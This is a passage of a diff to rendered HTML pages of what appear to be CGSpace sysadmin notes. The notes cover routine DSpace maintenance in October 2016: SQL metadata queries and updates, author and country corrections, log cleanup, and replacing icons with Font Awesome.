<li>I exported a random item&rsquo;s metadata as CSV, deleted <em>all columns</em> except id and collection, and made a new coloum called <code>ORCID:dc.contributor.author</code> with the following random ORCIDs from the ORCID registry:</li>
</ul>
<pre><code>0000-0002-6115-0956||0000-0002-3812-8793||0000-0001-7462-405X
<pre tabindex="0"><code>0000-0002-6115-0956||0000-0002-3812-8793||0000-0001-7462-405X
</code></pre><ul>
<li>Hmm, with the <code>dc.contributor.author</code> column removed, DSpace doesn&rsquo;t detect any changes</li>
<li>With a blank <code>dc.contributor.author</code> column, DSpace wants to remove all non-ORCID authors and add the new ORCID authors</li>
@ -161,14 +161,14 @@ I exported a random item&rsquo;s metadata as CSV, deleted all columns except id
</li>
<li>That left us with 3,180 valid corrections and 3 deletions:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i authors-fix-3180.csv -f dc.contributor.author -t correct -m 3 -d dspacetest -u dspacetest -p fuuu
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i authors-fix-3180.csv -f dc.contributor.author -t correct -m 3 -d dspacetest -u dspacetest -p fuuu
$ ./delete-metadata-values.py -i authors-delete-3.csv -f dc.contributor.author -m 3 -d dspacetest -u dspacetest -p fuuu
</code></pre><ul>
<li>Remove old about page (<a href="https://github.com/ilri/DSpace/pull/284">#284</a>)</li>
<li>CGSpace crashed a few times today</li>
<li>Generate list of unique authors in CCAFS collections:</li>
</ul>
<pre><code>dspacetest=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/32729', '10568/5472', '10568/5473', '10568/10288', '10568/70974', '10568/3547', '10568/3549', '10568/3531','10568/16890','10568/5470','10568/3546', '10568/36024', '10568/66581', '10568/21789', '10568/5469', '10568/5468', '10568/3548', '10568/71053', '10568/25167'))) group by text_value order by count desc) to /tmp/ccafs-authors.csv with csv;
<pre tabindex="0"><code>dspacetest=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/32729&#39;, &#39;10568/5472&#39;, &#39;10568/5473&#39;, &#39;10568/10288&#39;, &#39;10568/70974&#39;, &#39;10568/3547&#39;, &#39;10568/3549&#39;, &#39;10568/3531&#39;,&#39;10568/16890&#39;,&#39;10568/5470&#39;,&#39;10568/3546&#39;, &#39;10568/36024&#39;, &#39;10568/66581&#39;, &#39;10568/21789&#39;, &#39;10568/5469&#39;, &#39;10568/5468&#39;, &#39;10568/3548&#39;, &#39;10568/71053&#39;, &#39;10568/25167&#39;))) group by text_value order by count desc) to /tmp/ccafs-authors.csv with csv;
</code></pre><h2 id="2016-10-05">2016-10-05</h2>
<ul>
<li>Work on more infrastructure cleanups for Ansible DSpace role</li>
@ -190,13 +190,13 @@ $ ./delete-metadata-values.py -i authors-delete-3.csv -f dc.contributor.author -
<li>Re-deploy CGSpace with latest changes from late September and early October</li>
<li>Run fixes for ILRI subjects and delete blank metadata values:</li>
</ul>
<pre><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value=&#39;&#39;;
DELETE 11
</code></pre><ul>
<li>Run all system updates and reboot CGSpace</li>
<li>Delete ten gigs of old 2015 Tomcat logs that never got rotated (WTF?):</li>
</ul>
<pre><code>root@linode01:~# ls -lh /var/log/tomcat7/localhost_access_log.2015* | wc -l
<pre tabindex="0"><code>root@linode01:~# ls -lh /var/log/tomcat7/localhost_access_log.2015* | wc -l
47
</code></pre><ul>
<li>Delete 2GB <code>cron-filter-media.log</code> file, as it is just a log from a cron job and it doesn&rsquo;t get rotated like normal log files (almost a year now maybe)</li>
@ -211,7 +211,7 @@ DELETE 11
<ul>
<li>A bit more cleanup on the CCAFS authors, and run the corrections on DSpace Test:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i ccafs-authors-oct-16.csv -f dc.contributor.author -t 'correct name' -m 3 -d dspace -u dspace -p fuuu
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i ccafs-authors-oct-16.csv -f dc.contributor.author -t &#39;correct name&#39; -m 3 -d dspace -u dspace -p fuuu
</code></pre><ul>
<li>One observation is that there are still some old versions of names in the author lookup because authors appear in other communities (as we only corrected authors from CCAFS for this round)</li>
</ul>
@ -219,7 +219,7 @@ DELETE 11
<ul>
<li>Start working on DSpace 5.5 porting work again:</li>
</ul>
<pre><code>$ git checkout -b 5_x-55 5_x-prod
<pre tabindex="0"><code>$ git checkout -b 5_x-55 5_x-prod
$ git rebase -i dspace-5.5
</code></pre><ul>
<li>Have to fix about ten merge conflicts, mostly in the SCSS for the CGIAR theme</li>
@ -248,40 +248,40 @@ $ git rebase -i dspace-5.5
<ul>
<li>Move the LIVES community from the top level to the ILRI projects community</li>
</ul>
<pre><code>$ /home/cgspace.cgiar.org/bin/dspace community-filiator --set --parent=10568/27629 --child=10568/25101
<pre tabindex="0"><code>$ /home/cgspace.cgiar.org/bin/dspace community-filiator --set --parent=10568/27629 --child=10568/25101
</code></pre><ul>
<li>Start testing some things for DSpace 5.5, like command line metadata import, PDF media filter, and Atmire CUA</li>
<li>Start looking at batch fixing of &ldquo;old&rdquo; ILRI website links without www or https, for example:</li>
</ul>
<pre><code>dspace=# select * from metadatavalue where resource_type_id=2 and text_value like 'http://ilri.org%';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and text_value like &#39;http://ilri.org%&#39;;
</code></pre><ul>
<li>Also CCAFS has HTTPS and their links should use it where possible:</li>
</ul>
<pre><code>dspace=# select * from metadatavalue where resource_type_id=2 and text_value like 'http://ccafs.cgiar.org%';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and text_value like &#39;http://ccafs.cgiar.org%&#39;;
</code></pre><ul>
<li>And this will find community and collection HTML text that is using the old style PNG/JPG icons for RSS and email (we should be using Font Awesome icons instead):</li>
</ul>
<pre><code>dspace=# select text_value from metadatavalue where resource_type_id in (3,4) and text_value like '%Iconrss2.png%';
<pre tabindex="0"><code>dspace=# select text_value from metadatavalue where resource_type_id in (3,4) and text_value like &#39;%Iconrss2.png%&#39;;
</code></pre><ul>
<li>Turns out there are shit tons of varieties of this, like with http, https, www, separate <code>&lt;/img&gt;</code> tags, alignments, etc</li>
<li>Had to find all variations and replace them individually:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;https://www.ilri.org/images/Iconrss2.png&quot;/&gt;','&lt;span class=&quot;fa fa-rss fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;https://www.ilri.org/images/Iconrss2.png&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;https://www.ilri.org/images/email.jpg&quot;/&gt;', '&lt;span class=&quot;fa fa-at fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;https://www.ilri.org/images/email.jpg&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;http://www.ilri.org/images/Iconrss2.png&quot;/&gt;', '&lt;span class=&quot;fa fa-rss fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;http://www.ilri.org/images/Iconrss2.png&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;http://www.ilri.org/images/email.jpg&quot;/&gt;', '&lt;span class=&quot;fa fa-at fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;http://www.ilri.org/images/email.jpg&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;http://www.ilri.org/images/Iconrss2.png&quot;&gt;&lt;/img&gt;', '&lt;span class=&quot;fa fa-rss fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;http://www.ilri.org/images/Iconrss2.png&quot;&gt;&lt;/img&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;http://www.ilri.org/images/email.jpg&quot;&gt;&lt;/img&gt;', '&lt;span class=&quot;fa fa-at fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;http://www.ilri.org/images/email.jpg&quot;&gt;&lt;/img&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;https://ilri.org/images/Iconrss2.png&quot;&gt;&lt;/img&gt;', '&lt;span class=&quot;fa fa-rss fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;https://ilri.org/images/Iconrss2.png&quot;&gt;&lt;/img&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;https://ilri.org/images/email.jpg&quot;&gt;&lt;/img&gt;', '&lt;span class=&quot;fa fa-at fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;https://ilri.org/images/email.jpg&quot;&gt;&lt;/img&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;https://www.ilri.org/images/Iconrss2.png&quot;&gt;&lt;/img&gt;', '&lt;span class=&quot;fa fa-rss fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;https://www.ilri.org/images/Iconrss2.png&quot;&gt;&lt;/img&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;https://www.ilri.org/images/email.jpg&quot;&gt;&lt;/img&gt;', '&lt;span class=&quot;fa fa-at fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;https://www.ilri.org/images/email.jpg&quot;&gt;&lt;/img&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;https://ilri.org/images/Iconrss2.png&quot;/&gt;', '&lt;span class=&quot;fa fa-rss fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;https://ilri.org/images/Iconrss2.png&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;https://ilri.org/images/email.jpg&quot;/&gt;', '&lt;span class=&quot;fa fa-at fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;https://ilri.org/images/email.jpg&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img valign=&quot;center&quot; align=&quot;left&quot; src=&quot;https://www.ilri.org/images/Iconrss2.png&quot;/&gt;', '&lt;span class=&quot;fa fa-rss fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img valign=&quot;center&quot; align=&quot;left&quot; src=&quot;https://www.ilri.org/images/Iconrss2.png&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img valign=&quot;center&quot; align=&quot;left&quot; src=&quot;https://www.ilri.org/images/email.jpg&quot;/&gt;', '&lt;span class=&quot;fa fa-at fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img valign=&quot;center&quot; align=&quot;left&quot; src=&quot;https://www.ilri.org/images/email.jpg&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img valign=&quot;center&quot; align=&quot;left&quot; src=&quot;http://www.ilri.org/images/Iconrss2.png&quot;/&gt;', '&lt;span class=&quot;fa fa-rss fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img valign=&quot;center&quot; align=&quot;left&quot; src=&quot;http://www.ilri.org/images/Iconrss2.png&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img valign=&quot;center&quot; align=&quot;left&quot; src=&quot;http://www.ilri.org/images/email.jpg&quot;/&gt;', '&lt;span class=&quot;fa fa-at fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img valign=&quot;center&quot; align=&quot;left&quot; src=&quot;http://www.ilri.org/images/email.jpg&quot;/&gt;%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/Iconrss2.png&#34;/&gt;&#39;,&#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/Iconrss2.png&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/email.jpg&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/email.jpg&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/Iconrss2.png&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/Iconrss2.png&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/email.jpg&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/email.jpg&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/Iconrss2.png&#34;&gt;&lt;/img&gt;&#39;, &#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/Iconrss2.png&#34;&gt;&lt;/img&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/email.jpg&#34;&gt;&lt;/img&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/email.jpg&#34;&gt;&lt;/img&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/Iconrss2.png&#34;&gt;&lt;/img&gt;&#39;, &#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/Iconrss2.png&#34;&gt;&lt;/img&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/email.jpg&#34;&gt;&lt;/img&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/email.jpg&#34;&gt;&lt;/img&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/Iconrss2.png&#34;&gt;&lt;/img&gt;&#39;, &#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/Iconrss2.png&#34;&gt;&lt;/img&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/email.jpg&#34;&gt;&lt;/img&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/email.jpg&#34;&gt;&lt;/img&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/Iconrss2.png&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/Iconrss2.png&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/email.jpg&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/email.jpg&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;https://www.ilri.org/images/Iconrss2.png&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;https://www.ilri.org/images/Iconrss2.png&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;https://www.ilri.org/images/email.jpg&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;https://www.ilri.org/images/email.jpg&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;http://www.ilri.org/images/Iconrss2.png&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;http://www.ilri.org/images/Iconrss2.png&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;http://www.ilri.org/images/email.jpg&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;http://www.ilri.org/images/email.jpg&#34;/&gt;%&#39;;
</code></pre><ul>
<li>Getting rid of these reduces the number of network requests each client makes on community/collection pages, and makes use of Font Awesome icons (which they are already loading anyways!)</li>
<li>And now that I start looking, I want to fix a bunch of links to popular sites that should be using HTTPS, like Twitter, Facebook, Google, Feed Burner, DOI, etc</li>
@ -291,7 +291,7 @@ dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;i
<ul>
<li>Run Font Awesome fixes on DSpace Test:</li>
</ul>
<pre><code>dspace=# \i /tmp/font-awesome-text-replace.sql
<pre tabindex="0"><code>dspace=# \i /tmp/font-awesome-text-replace.sql
UPDATE 17
UPDATE 17
UPDATE 3
@ -321,9 +321,9 @@ UPDATE 0
<ul>
<li>Fix some messed up authors on CGSpace:</li>
</ul>
<pre><code>dspace=# update metadatavalue set authority='799da1d8-22f3-43f5-8233-3d2ef5ebf8a8', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Charleston, B.%';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;799da1d8-22f3-43f5-8233-3d2ef5ebf8a8&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Charleston, B.%&#39;;
UPDATE 10
dspace=# update metadatavalue set authority='e936f5c5-343d-4c46-aa91-7a1fff6277ed', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Knight-Jones%';
dspace=# update metadatavalue set authority=&#39;e936f5c5-343d-4c46-aa91-7a1fff6277ed&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Knight-Jones%&#39;;
UPDATE 36
</code></pre><ul>
<li>I updated the authority index but nothing seemed to change, so I&rsquo;ll wait and do it again after I update Discovery below</li>
@ -332,23 +332,23 @@ UPDATE 36
<li>Talk to Carlos Quiros about CG Core metadata in CGSpace</li>
<li>Get a list of countries from CGSpace so I can do some batch corrections:</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id=228 group by text_value order by count desc) to /tmp/countries.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id=228 group by text_value order by count desc) to /tmp/countries.csv with csv;
</code></pre><ul>
<li>Fix a bunch of countries in Open Refine and run the corrections on CGSpace:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i countries-fix-18.csv -f dc.coverage.country -t 'correct' -m 228 -d dspace -u dspace -p fuuu
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i countries-fix-18.csv -f dc.coverage.country -t &#39;correct&#39; -m 228 -d dspace -u dspace -p fuuu
$ ./delete-metadata-values.py -i countries-delete-2.csv -f dc.coverage.country -m 228 -d dspace -u dspace -p fuuu
</code></pre><ul>
<li>Run a shit ton of author fixes from Peter Ballantyne that we&rsquo;ve been cleaning up for two months:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/authors-fix-pb2.csv -f dc.contributor.author -t correct -m 3 -u dspace -d dspace -p fuuu
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/authors-fix-pb2.csv -f dc.contributor.author -t correct -m 3 -u dspace -d dspace -p fuuu
</code></pre><ul>
<li>Run a few URL corrections for ilri.org and doi.org, etc:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://www.ilri.org','https://www.ilri.org') where resource_type_id=2 and text_value like '%http://www.ilri.org%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://mahider.ilri.org', 'https://cgspace.cgiar.org') where resource_type_id=2 and text_value like '%http://mahider.%.org%' and metadata_field_id not in (28);
dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://dx.doi.org', 'https://dx.doi.org') where resource_type_id=2 and text_value like '%http://dx.doi.org%' and metadata_field_id not in (18,26,28,111);
dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://doi.org', 'https://dx.doi.org') where resource_type_id=2 and text_value like '%http://doi.org%' and metadata_field_id not in (18,26,28,111);
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://www.ilri.org&#39;,&#39;https://www.ilri.org&#39;) where resource_type_id=2 and text_value like &#39;%http://www.ilri.org%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://mahider.ilri.org&#39;, &#39;https://cgspace.cgiar.org&#39;) where resource_type_id=2 and text_value like &#39;%http://mahider.%.org%&#39; and metadata_field_id not in (28);
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://dx.doi.org&#39;, &#39;https://dx.doi.org&#39;) where resource_type_id=2 and text_value like &#39;%http://dx.doi.org%&#39; and metadata_field_id not in (18,26,28,111);
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://doi.org&#39;, &#39;https://dx.doi.org&#39;) where resource_type_id=2 and text_value like &#39;%http://doi.org%&#39; and metadata_field_id not in (18,26,28,111);
</code></pre><ul>
<li>I skipped metadata fields like citation and description</li>
</ul>
@ -372,15 +372,15 @@ dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http:
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

File diff suppressed because one or more lines are too long

View File

@ -12,11 +12,11 @@
CGSpace was down for five hours in the morning while I was sleeping
While looking in the logs for errors, I see tons of warnings about Atmire MQM:
2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&quot;dc.title&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&quot;THUMBNAIL&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&quot;-1&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
